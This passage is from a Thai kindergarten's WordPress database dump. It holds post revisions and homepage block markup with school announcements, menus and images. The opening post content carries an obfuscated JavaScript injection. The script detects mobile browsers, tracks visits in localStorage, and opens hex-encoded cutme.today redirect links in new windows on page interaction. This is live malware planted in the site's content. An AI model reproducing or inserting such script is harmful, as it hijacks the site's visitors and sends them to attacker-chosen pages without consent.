_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับคุณครูและนักเรียนผู้ได้รับรางวัลการประกวดวาดภาพในโครงการส่งเสริมพระพุทธศาสนาเนื่องในวันอาสาฬหบูชาและวันเข้าพรรษา','','inherit','closed','closed','','100-revision-v1','','','2024-07-29 18:40:14','2024-07-29 11:40:14','',100,'http://watprato.ssk.in.th/?p=102',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(103,1,'2024-07-29 18:41:27','2024-07-29 11:41:27','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 